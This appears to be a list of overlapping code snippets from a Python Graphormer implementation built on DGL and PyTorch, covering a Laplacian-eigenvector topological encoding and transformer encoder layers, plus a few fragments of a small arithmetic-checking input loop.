"== \"+\": correct_ans = int(num1) + int(num2) elif sign1 == \"-\": correct_ans =",
"c = int(input()) while c != 0: c -= 1 num1, sign1, num2,",
"= input().split() correct_ans = 0 if sign1 == \"+\": correct_ans = int(num1) +",
"!= 0: c -= 1 num1, sign1, num2, sign2, ans = input().split() correct_ans"
] |
[
"import torch.nn as nn import torch.nn.functional as F import numpy as np from",
"= self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src = self.norm2(src)",
"device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth = depth self.nhead = nhead self.dim_feedforward",
"encode(self, graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D - A).numpy()",
"< 0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model,",
"def __setstate__(self, state): if 'activation' not in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state)",
"nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph)",
"alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth = depth self.nhead =",
"graphs.ndata['h'] = encoding + embedding.squeeze() batch = [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h'])",
"import torch.nn.functional as F import numpy as np from scipy.linalg import eig class",
"def __init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense() D",
"def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead,",
"src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src = self.norm1(src) src2 =",
"self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze() batch",
"momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif clipping < 0:",
"self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src = self.norm2(src) return src, scores class",
"graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()),",
"def encode(self, graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D -",
"dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 =",
"= nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state): if 'activation' not in state:",
"state): if 'activation' not in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self,",
"batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in self.blocks: h, att_",
"h, att_ = block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :] for",
"= self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src = self.norm2(src) return src, scores",
"expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth = depth self.nhead",
"F import numpy as np from scipy.linalg import eig class TopologicalEncoding(): def __init__(self,",
"h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in self.blocks: h, att_ =",
"d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks =",
"embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze() batch = [] for g",
"self.norm2(src) return src, scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100,",
"dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in self.blocks: h,",
"nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu",
"self.depth = depth self.nhead = nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding =",
"self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2",
"class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self, graph): A =",
"F.relu def __setstate__(self, state): if 'activation' not in state: state['activation'] = F.relu super(TransformerEncoderLayer,",
"= (D - A).numpy() w, V = eig(L) momenta = np.dot(L, V) clipping",
"= src + self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src",
"encoding + embedding.squeeze() batch = [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h =",
"TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense()",
"range(depth)]) def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0)",
"torch.nn as nn import torch.nn.functional as F import numpy as np from scipy.linalg",
"= np.dot(L, V) clipping = self.encoding_size - graph.num_nodes() if clipping > 0: momenta_",
"self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model)",
"momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif clipping < 0: momenta = momenta[:,",
"src = src + self.dropout2(src2) src = self.norm2(src) return src, scores class Graphormer(nn.Module):",
"self.activation = F.relu def __setstate__(self, state): if 'activation' not in state: state['activation'] =",
"Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model",
"nn import torch.nn.functional as F import numpy as np from scipy.linalg import eig",
"encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding:",
"attentions_ = [] for block in self.blocks: h, att_ = block(h) if need_weights:",
"d_model self.depth = depth self.nhead = nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding",
"= depth self.nhead = nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding = concatenate_encoding",
"= encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L =",
"need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if",
"src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src",
"L = (D - A).numpy() w, V = eig(L) momenta = np.dot(L, V)",
"self.encoding_size = encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L",
"eig(L) momenta = np.dot(L, V) clipping = self.encoding_size - graph.num_nodes() if clipping >",
"self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder =",
"self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state): if",
"momenta = np.dot(L, V) clipping = self.encoding_size - graph.num_nodes() if clipping > 0:",
"i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if need_weights: return h, attentions_",
"attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))",
"encoding_size=50): self.encoding_size = encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees())",
"dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward)",
"src2, scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2)",
"key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src",
"* expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size,",
"clipping < 0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self,",
"src + self.dropout2(src2) src = self.norm2(src) return src, scores class Graphormer(nn.Module): def __init__(self,",
"import dgl import torch import torch.nn as nn import torch.nn.functional as F import",
"= nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation =",
"clipping))) momenta = np.array(momenta_) elif clipping < 0: momenta = momenta[:, :self.encoding_size] return",
"= nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self, graphs, need_weights=False): encoding",
"src + self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src +",
"self.nhead = nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding:",
"self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src = self.norm1(src)",
"dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else:",
"block in self.blocks: h, att_ = block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes,",
"= TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self,",
"import eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self, graph):",
"numpy as np from scipy.linalg import eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size",
"concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else:",
"in self.blocks: h, att_ = block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i,",
"self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size,",
"A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D - A).numpy() w, V",
"nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state): if 'activation' not in state: state['activation']",
"self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout)",
"'activation' not in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None,",
"activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout",
"not in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None):",
"depth self.nhead = nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if",
"nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks",
"forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src",
"= self.encoding_size - graph.num_nodes() if clipping > 0: momenta_ = [] for momentum",
"momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048,",
"momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"):",
"= nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1",
"nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth = depth",
"self.d_model = d_model self.depth = depth self.nhead = nhead self.dim_feedforward = d_model *",
"V) clipping = self.encoding_size - graph.num_nodes() if clipping > 0: momenta_ = []",
"nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward,",
"in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2,",
"class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__()",
"encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth = depth self.nhead = nhead",
"torch import torch.nn as nn import torch.nn.functional as F import numpy as np",
"np.array(momenta_) elif clipping < 0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module):",
"= nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder",
"encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead,",
"def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding",
"= [] for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif",
"dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h']",
"self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state): if 'activation' not in",
"= torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in self.blocks: h, att_ = block(h)",
"super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout =",
"def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model =",
"i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if need_weights:",
"attentions_.append(att_) truncated = [h[:num_nodes, i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h =",
"scipy.linalg import eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self,",
"V = eig(L) momenta = np.dot(L, V) clipping = self.encoding_size - graph.num_nodes() if",
"nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder =",
"TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self, graphs,",
"if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())]",
"- A).numpy() w, V = eig(L) momenta = np.dot(L, V) clipping = self.encoding_size",
"self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding +",
"[] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for",
"encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D",
"= np.array(momenta_) elif clipping < 0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class",
"0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead,",
"= nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state): if 'activation'",
"src = src + self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src =",
"__init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model",
"= [] for block in self.blocks: h, att_ = block(h) if need_weights: attentions_.append(att_)",
"torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze() batch = [] for",
"truncated = [h[:num_nodes, i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated,",
"nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model)",
"g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in",
"forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding =",
"self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src",
"class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn =",
"nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 =",
"dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1",
"nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 =",
"TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder",
"dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for",
"self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for",
"def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask)",
"for _ in range(depth)]) def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph",
"src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src +",
"graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long))",
"need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h",
"<reponame>rdangovs/6883-project import dgl import torch import torch.nn as nn import torch.nn.functional as F",
"D = torch.diag(graph.in_degrees()) L = (D - A).numpy() w, V = eig(L) momenta",
"= momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1,",
"= src + self.dropout2(src2) src = self.norm2(src) return src, scores class Graphormer(nn.Module): def",
"self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def",
"scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src",
"as nn import torch.nn.functional as F import numpy as np from scipy.linalg import",
"__setstate__(self, state): if 'activation' not in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def",
"self.dropout2(src2) src = self.norm2(src) return src, scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5,",
"nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in",
"d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1",
"__init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)",
"torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] =",
"= torch.diag(graph.in_degrees()) L = (D - A).numpy() w, V = eig(L) momenta =",
"in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif clipping < 0: momenta",
"state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores =",
"np.dot(L, V) clipping = self.encoding_size - graph.num_nodes() if clipping > 0: momenta_ =",
"= d_model self.depth = depth self.nhead = nhead self.dim_feedforward = d_model * expansion_factor",
"= nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _",
"src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src = self.norm1(src) src2",
"in range(depth)]) def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)],",
"depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth =",
"elif clipping < 0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def",
"graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze() batch =",
"= nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model)",
"A).numpy() w, V = eig(L) momenta = np.dot(L, V) clipping = self.encoding_size -",
"src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src =",
"for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif clipping <",
"clipping = self.encoding_size - graph.num_nodes() if clipping > 0: momenta_ = [] for",
"self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation",
"= nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def __setstate__(self,",
"scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True):",
"= encoding + embedding.squeeze() batch = [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h",
"graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D - A).numpy() w,",
"= [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = []",
"- graph.num_nodes() if clipping > 0: momenta_ = [] for momentum in momenta:",
"for graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding,",
"0: momenta_ = [] for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta =",
"for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block",
"in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if need_weights: return h, attentions_ return h",
"(D - A).numpy() w, V = eig(L) momenta = np.dot(L, V) clipping =",
"src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src =",
"np from scipy.linalg import eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size",
":] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if need_weights: return",
"att_ = block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :] for i,",
"src = self.norm2(src) return src, scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8,",
"torch.diag(graph.in_degrees()) L = (D - A).numpy() w, V = eig(L) momenta = np.dot(L,",
"__init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense() D =",
"TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model,",
"dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model,",
"concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth = depth self.nhead = nhead self.dim_feedforward =",
"= TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model)",
"= torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze() batch = []",
"src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src = self.norm2(src) return src,",
"as np from scipy.linalg import eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size =",
"w, V = eig(L) momenta = np.dot(L, V) clipping = self.encoding_size - graph.num_nodes()",
"+ embedding.squeeze() batch = [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch)",
"batch = [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ =",
"d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)])",
"= [h[:num_nodes, i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0)",
"= block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :] for i, num_nodes",
"else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward)",
"= self.norm2(src) return src, scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2,",
"if clipping > 0: momenta_ = [] for momentum in momenta: momenta_.append(np.pad(momentum, (0,",
"= nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 =",
"return src, scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32,",
"in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in self.blocks:",
"self.encoding_size - graph.num_nodes() if clipping > 0: momenta_ = [] for momentum in",
"F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src,",
